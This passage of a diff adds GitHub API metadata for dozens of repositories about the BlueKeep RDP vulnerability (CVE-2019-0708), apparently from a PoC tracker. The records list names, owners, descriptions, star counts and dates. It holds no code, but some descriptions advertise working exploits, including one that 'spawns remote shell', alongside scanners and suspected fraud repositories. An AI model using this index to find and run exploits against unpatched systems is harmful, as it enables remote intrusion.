"has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 39, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 186923282, + "name": "CVE-2019-0708", + "full_name": "Barry-McCockiner\/CVE-2019-0708", + "owner": { + "login": "Barry-McCockiner", + "id": 50684175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50684175?v=4", + "html_url": "https:\/\/github.com\/Barry-McCockiner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Barry-McCockiner\/CVE-2019-0708", + "description": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.", + "fork": false, + "created_at": "2019-05-16T00:45:55Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-16T00:52:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 186924355, + "name": "CVE-2019-0708", + "full_name": "ShadowBrokers-ExploitLeak\/CVE-2019-0708", + "owner": { + "login": "ShadowBrokers-ExploitLeak", + "id": 50684502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50684502?v=4", + "html_url": "https:\/\/github.com\/ShadowBrokers-ExploitLeak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowBrokers-ExploitLeak\/CVE-2019-0708", + "description": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.", + "fork": false, + "created_at": "2019-05-16T00:56:58Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-16T01:00:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187001080, + "name": "CVE-2019-0708", + "full_name": "safly\/CVE-2019-0708", + "owner": { + "login": "safly", + "id": 10373139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10373139?v=4", + "html_url": "https:\/\/github.com\/safly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safly\/CVE-2019-0708", + "description": "CVE-2019-0708 demo", + "fork": false, + "created_at": "2019-05-16T09:55:25Z", + "updated_at": "2024-08-12T19:48:57Z", + "pushed_at": "2019-05-16T04:25:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187032294, + "name": "cve-2019-0708-exp", + "full_name": "Jaky5155\/cve-2019-0708-exp", + "owner": { + "login": "Jaky5155", + "id": 47801640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47801640?v=4", + "html_url": "https:\/\/github.com\/Jaky5155", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaky5155\/cve-2019-0708-exp", + "description": null, + "fork": false, + "created_at": "2019-05-16T13:21:02Z", + "updated_at": "2024-08-12T19:48:58Z", + "pushed_at": "2019-05-22T04:24:58Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0708-exp" + ], + "visibility": "public", + "forks": 24, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187057686, + "name": "CVE-2019-0708-Check-Device-Patch-Status", + "full_name": "fourtwizzy\/CVE-2019-0708-Check-Device-Patch-Status", + "owner": { + "login": "fourtwizzy", + "id": 1735941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1735941?v=4", + "html_url": "https:\/\/github.com\/fourtwizzy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fourtwizzy\/CVE-2019-0708-Check-Device-Patch-Status", + "description": "Powershell script to run and determine if a specific device has been patched for CVE-2019-0708. This checks to see if the termdd.sys file has been updated appropriate and is at a version level at or greater than the versions released in the 5\/14\/19 patches.", + "fork": false, + "created_at": "2019-05-16T15:47:29Z", + "updated_at": "2024-08-12T19:48:58Z", + "pushed_at": "2019-08-28T17:14:57Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 187063902, + "name": "CVE-2019-0708", + "full_name": "303sec\/CVE-2019-0708", + "owner": { + "login": "303sec", + "id": 39656643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39656643?v=4", + "html_url": "https:\/\/github.com\/303sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/303sec\/CVE-2019-0708", + "description": "POC for CVE-2019-0708", + "fork": false, + "created_at": "2019-05-16T16:26:30Z", + "updated_at": "2024-08-12T19:48:58Z", + "pushed_at": "2019-05-17T08:34:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187097173, + "name": "CVE-2019-0708-POC", + "full_name": "f8al\/CVE-2019-0708-POC", + "owner": { + "login": "f8al", + "id": 7221183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7221183?v=4", + "html_url": "https:\/\/github.com\/f8al", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f8al\/CVE-2019-0708-POC", + "description": "PoC for CVE-2019-0708", + "fork": false, + "created_at": "2019-05-16T20:30:36Z", + "updated_at": "2024-08-12T19:48:58Z", + "pushed_at": "2019-05-28T22:20:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187139993, + "name": "CVE-2019-0708", + "full_name": "blockchainguard\/CVE-2019-0708", + "owner": { + "login": "blockchainguard", + "id": 43979150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43979150?v=4", + "html_url": "https:\/\/github.com\/blockchainguard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blockchainguard\/CVE-2019-0708", + "description": "CVE-2019-0708漏洞MSF批量巡检插件", + "fork": false, + "created_at": "2019-05-17T03:25:42Z", + "updated_at": "2024-08-12T19:48:59Z", + "pushed_at": "2019-05-23T04:21:09Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187297714, + "name": "CVE-2019-0708", + "full_name": "yushiro\/CVE-2019-0708", + "owner": { + "login": "yushiro", + "id": 415386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/415386?v=4", + "html_url": "https:\/\/github.com\/yushiro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yushiro\/CVE-2019-0708", + "description": "LOL", + "fork": false, + "created_at": "2019-05-18T00:45:15Z", + "updated_at": "2024-08-12T19:49:01Z", + "pushed_at": "2019-05-17T13:01:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 187538824, + "name": "CVE-2019-0708-PoC-Hitting-Path", + "full_name": "skyshell20082008\/CVE-2019-0708-PoC-Hitting-Path", + "owner": { + "login": "skyshell20082008", + "id": 32186292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32186292?v=4", + "html_url": "https:\/\/github.com\/skyshell20082008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyshell20082008\/CVE-2019-0708-PoC-Hitting-Path", + "description": "It's only hitting vulnerable path in termdd.sys!!! NOT DOS", + "fork": false, + "created_at": "2019-05-19T23:32:34Z", + "updated_at": "2024-08-12T19:49:04Z", + "pushed_at": "2019-05-19T17:47:28Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 101, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 101, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187567229, + "name": "CVE-2019-0708-", + "full_name": "ttsite\/CVE-2019-0708-", + "owner": { + "login": "ttsite", + "id": 43260559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43260559?v=4", + "html_url": "https:\/\/github.com\/ttsite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ttsite\/CVE-2019-0708-", + "description": "Announces fraud", + "fork": false, + "created_at": "2019-05-20T04:23:58Z", + "updated_at": "2024-08-12T19:49:05Z", + "pushed_at": "2019-06-11T14:50:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187758878, + "name": "CVE-2019-0708", + "full_name": "ttsite\/CVE-2019-0708", + "owner": { + "login": "ttsite", + "id": 43260559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43260559?v=4", + "html_url": "https:\/\/github.com\/ttsite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ttsite\/CVE-2019-0708", + "description": "Report fraud", + "fork": false, + "created_at": "2019-05-21T04:00:49Z", + "updated_at": "2019-07-04T09:25:15Z", + "pushed_at": "2019-07-04T09:25:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187768807, + "name": "CVE-2019-0708-poc", + "full_name": "biggerwing\/CVE-2019-0708-poc", + "owner": { + "login": "biggerwing", + "id": 23331519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23331519?v=4", + "html_url": "https:\/\/github.com\/biggerwing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biggerwing\/CVE-2019-0708-poc", + "description": "CVE-2019-0708 远程代码执行漏洞批量检测", + "fork": false, + "created_at": "2019-05-21T05:38:54Z", + "updated_at": "2024-08-12T19:49:06Z", + "pushed_at": "2019-05-30T02:43:06Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 82, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187779603, + "name": "CVE-2019-0708", + "full_name": "n1xbyte\/CVE-2019-0708", + "owner": { + "login": "n1xbyte", + "id": 18420902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18420902?v=4", + "html_url": "https:\/\/github.com\/n1xbyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n1xbyte\/CVE-2019-0708", + "description": "dump", + "fork": false, + "created_at": "2019-05-21T06:57:19Z", + "updated_at": "2024-08-12T19:49:06Z", + "pushed_at": "2019-06-01T05:15:11Z", + "stargazers_count": 491, + "watchers_count": 491, + "has_discussions": false, + "forks_count": 178, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 178, + "watchers": 491, + "score": 0, + "subscribers_count": 34 + }, + { + "id": 187788453, + "name": "CVE-2019-0708", + "full_name": "freeide\/CVE-2019-0708", + "owner": { + "login": "freeide", + "id": 33774184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4", + "html_url": "https:\/\/github.com\/freeide", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeide\/CVE-2019-0708", + "description": "High level exploit", + "fork": false, + "created_at": "2019-05-21T07:51:41Z", + "updated_at": "2024-08-12T19:49:06Z", + "pushed_at": "2019-05-15T20:54:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187816400, + "name": "CVE-2019-0708-POC", + "full_name": "edvacco\/CVE-2019-0708-POC", + "owner": { + "login": "edvacco", + "id": 29772843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29772843?v=4", + "html_url": "https:\/\/github.com\/edvacco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edvacco\/CVE-2019-0708-POC", + "description": "根据360的程序,整的CVE-2019-0708批量检测", + "fork": false, + "created_at": "2019-05-21T10:34:21Z", + "updated_at": "2024-08-12T19:49:06Z", + "pushed_at": "2019-05-21T07:51:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 187824958, + "name": "BlueKeepTracker", + "full_name": "pry0cc\/BlueKeepTracker", + "owner": { + "login": "pry0cc", + "id": 4334403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4334403?v=4", + "html_url": "https:\/\/github.com\/pry0cc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pry0cc\/BlueKeepTracker", + "description": "My bot (badly written) to search and monitor cve-2019-0708 repositories ", + "fork": false, + "created_at": "2019-05-21T11:37:00Z", + "updated_at": "2024-08-12T19:49:07Z", + "pushed_at": "2019-05-21T11:38:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 187840993, + "name": "CVE-2019-0708-win7", + "full_name": "zjw88282740\/CVE-2019-0708-win7", + "owner": { + "login": "zjw88282740", + "id": 10476132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10476132?v=4", + "html_url": "https:\/\/github.com\/zjw88282740", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zjw88282740\/CVE-2019-0708-win7", + "description": null, + "fork": false, + "created_at": "2019-05-21T13:16:49Z", + "updated_at": "2024-08-12T19:49:07Z", + "pushed_at": "2019-05-21T13:17:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 187946230, + "name": "CVE-2019-0708", + "full_name": "victor0013\/CVE-2019-0708", + "owner": { + "login": "victor0013", + "id": 37926610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37926610?v=4", + "html_url": "https:\/\/github.com\/victor0013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/victor0013\/CVE-2019-0708", + "description": "Scanner PoC for CVE-2019-0708 RDP RCE vuln", + "fork": false, + "created_at": "2019-05-22T02:16:28Z", + "updated_at": "2024-08-12T19:49:08Z", + "pushed_at": "2019-05-22T02:13:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 370, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 370, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187953993, + "name": "CVE-2019-0708poc", + "full_name": "herhe\/CVE-2019-0708poc", + "owner": { + "login": "herhe", + "id": 22436480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22436480?v=4", + "html_url": "https:\/\/github.com\/herhe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herhe\/CVE-2019-0708poc", + "description": "根据360Vulcan Team开发的CVE-2019-0708单个IP检测工具构造了个批量检测脚本而已", + "fork": false, + "created_at": "2019-05-22T03:10:14Z", + "updated_at": "2019-05-27T09:42:33Z", + "pushed_at": "2019-05-27T09:42:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187967704, + "name": "rdp0708scanner", + "full_name": "l9c\/rdp0708scanner", + "owner": { + "login": "l9c", + "id": 16722567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16722567?v=4", + "html_url": "https:\/\/github.com\/l9c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l9c\/rdp0708scanner", + "description": "cve-2019-0708 vulnerablility scanner", + "fork": false, + "created_at": "2019-05-22T05:18:18Z", + "updated_at": "2024-08-12T19:49:09Z", + "pushed_at": "2019-05-22T06:06:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0708", + "poc", + "rdp", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 187990368, + "name": "cve-2019-0708-scan", + "full_name": "major203\/cve-2019-0708-scan", + "owner": { + "login": "major203", + "id": 7425945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7425945?v=4", + "html_url": "https:\/\/github.com\/major203", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/major203\/cve-2019-0708-scan", + "description": null, + "fork": false, + "created_at": "2019-05-22T07:53:50Z", + "updated_at": "2024-08-12T19:49:09Z", + "pushed_at": "2019-05-27T09:36:00Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 188186570, + "name": "Check-vuln-CVE-2019-0708", + "full_name": "SugiB3o\/Check-vuln-CVE-2019-0708", + "owner": { + "login": "SugiB3o", + "id": 24741216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24741216?v=4", + "html_url": "https:\/\/github.com\/SugiB3o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SugiB3o\/Check-vuln-CVE-2019-0708", + "description": "Check vuln CVE 2019-0708", + "fork": false, + "created_at": "2019-05-23T07:47:29Z", + "updated_at": "2024-08-12T19:49:13Z", + "pushed_at": "2019-05-23T07:54:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 188244264, + "name": "CVE-2019-0708", + "full_name": "gobysec\/CVE-2019-0708", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2019-0708", + "description": "Goby support CVE-2019-0708 \"BlueKeep\" vulnerability check", + "fork": false, + "created_at": "2019-05-23T13:54:24Z", + "updated_at": "2024-08-12T19:49:13Z", + "pushed_at": "2019-05-23T14:14:58Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 188274849, + "name": "CVE-2019-0708-POC", + "full_name": "smallFunction\/CVE-2019-0708-POC", + "owner": { + "login": "smallFunction", + "id": 50961833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50961833?v=4", + "html_url": "https:\/\/github.com\/smallFunction", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smallFunction\/CVE-2019-0708-POC", + "description": "Working proof of concept for CVE-2019-0708, spawns remote shell.", + "fork": false, + "created_at": "2019-05-23T17:02:00Z", + "updated_at": "2024-08-12T19:49:14Z", + "pushed_at": "2019-05-23T17:02:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 188287755, + "name": "CVE-2019-0708-PoC-Exploit", + "full_name": "freeide\/CVE-2019-0708-PoC-Exploit", + "owner": { + "login": "freeide", + "id": 33774184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4", + "html_url": "https:\/\/github.com\/freeide", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeide\/CVE-2019-0708-PoC-Exploit", + "description": "CVE-2019-0708 PoC Exploit", + "fork": false, + "created_at": "2019-05-23T18:37:27Z", + "updated_at": "2020-01-25T02:16:54Z", + "pushed_at": "2019-05-23T15:56:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 188316989, + "name": "rdpscan", + "full_name": "robertdavidgraham\/rdpscan", + "owner": { + "login": "robertdavidgraham", + "id": 3814757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3814757?v=4", + "html_url": "https:\/\/github.com\/robertdavidgraham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertdavidgraham\/rdpscan", + "description": "A quick scanner for the CVE-2019-0708 \"BlueKeep\" vulnerability.", + "fork": false, + "created_at": "2019-05-23T22:50:12Z", + "updated_at": "2024-11-15T02:04:17Z", + "pushed_at": "2019-06-22T21:48:45Z", + "stargazers_count": 895, + "watchers_count": 895, + "has_discussions": false, + "forks_count": 243, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 243, + "watchers": 895, + "score": 0, + "subscribers_count": 55 + }, + { + "id": 188376138, + "name": "CVE-2019-0708-POC", + "full_name": "closethe\/CVE-2019-0708-POC", + "owner": { + "login": "closethe", + "id": 8065436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8065436?v=4", + "html_url": "https:\/\/github.com\/closethe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/closethe\/CVE-2019-0708-POC", + "description": "cve-2019-0708 poc .", + "fork": false, + "created_at": "2019-05-24T07:40:05Z", + "updated_at": "2024-08-12T19:49:15Z", + "pushed_at": "2019-05-24T09:03:16Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 188417390, + "name": "CVE-2019-0708-Tool", + "full_name": "SQLDebugger\/CVE-2019-0708-Tool", + "owner": { + "login": "SQLDebugger", + "id": 46665531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46665531?v=4", + "html_url": "https:\/\/github.com\/SQLDebugger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SQLDebugger\/CVE-2019-0708-Tool", + "description": "50 first stargazers will get get the tool via email", + "fork": false, + "created_at": "2019-05-24T12:22:35Z", + "updated_at": "2019-05-24T12:22:38Z", + "pushed_at": "2019-05-31T16:45:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 188842935, + "name": "bluekeepscan", + "full_name": "Rostelecom-CERT\/bluekeepscan", + "owner": { + "login": "Rostelecom-CERT", + "id": 36195291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36195291?v=4", + "html_url": "https:\/\/github.com\/Rostelecom-CERT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rostelecom-CERT\/bluekeepscan", + "description": "CVE-2019-0708", + "fork": false, + "created_at": "2019-05-27T12:52:11Z", + "updated_at": "2024-08-12T19:49:22Z", + "pushed_at": "2019-05-27T12:58:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluekeep", + "cve-2019-0708", + "rdp", + "windows" + ], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 188939031, + "name": "CVE-2019-0708", + "full_name": "Leoid\/CVE-2019-0708", + "owner": { + "login": "Leoid", + "id": 19527552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19527552?v=4", + "html_url": "https:\/\/github.com\/Leoid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Leoid\/CVE-2019-0708", + "description": "Only Hitting PoC [Tested on Windows Server 2008 r2]", + "fork": false, + "created_at": "2019-05-28T02:25:21Z", + "updated_at": "2024-10-07T22:23:45Z", + "pushed_at": "2019-05-28T02:46:19Z", + "stargazers_count": 127, + "watchers_count": 127, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 127, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 189061944, + "name": "CVE-2019-0708Poc-BatchScanning", + "full_name": "ht0Ruial\/CVE-2019-0708Poc-BatchScanning", + "owner": { + "login": "ht0Ruial", + "id": 44924427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44924427?v=4", + "html_url": "https:\/\/github.com\/ht0Ruial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ht0Ruial\/CVE-2019-0708Poc-BatchScanning", + "description": "基于360公开的无损检测工具的可直接在windows上运行的批量检测程序", + "fork": false, + "created_at": "2019-05-28T16:09:10Z", + "updated_at": "2024-08-12T19:49:24Z", + "pushed_at": "2019-05-28T17:16:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 189126322, + "name": "BlueKeep", + "full_name": "oneoy\/BlueKeep", + "owner": { + "login": "oneoy", + "id": 38435398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4", + "html_url": "https:\/\/github.com\/oneoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oneoy\/BlueKeep", + "description": "CVE-2019-0708 bluekeep 漏洞检测", + "fork": false, + "created_at": "2019-05-29T01:08:55Z", + "updated_at": "2024-08-12T19:49:24Z", + "pushed_at": "2019-05-29T01:09:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 189158834, + "name": "CVE-2019-0708", + "full_name": "infiniti-team\/CVE-2019-0708", + "owner": { + "login": "infiniti-team", + "id": 51148759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51148759?v=4", + "html_url": "https:\/\/github.com\/infiniti-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infiniti-team\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-05-29T05:51:07Z", + "updated_at": "2024-08-12T19:49:25Z", + "pushed_at": "2019-05-29T06:10:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + 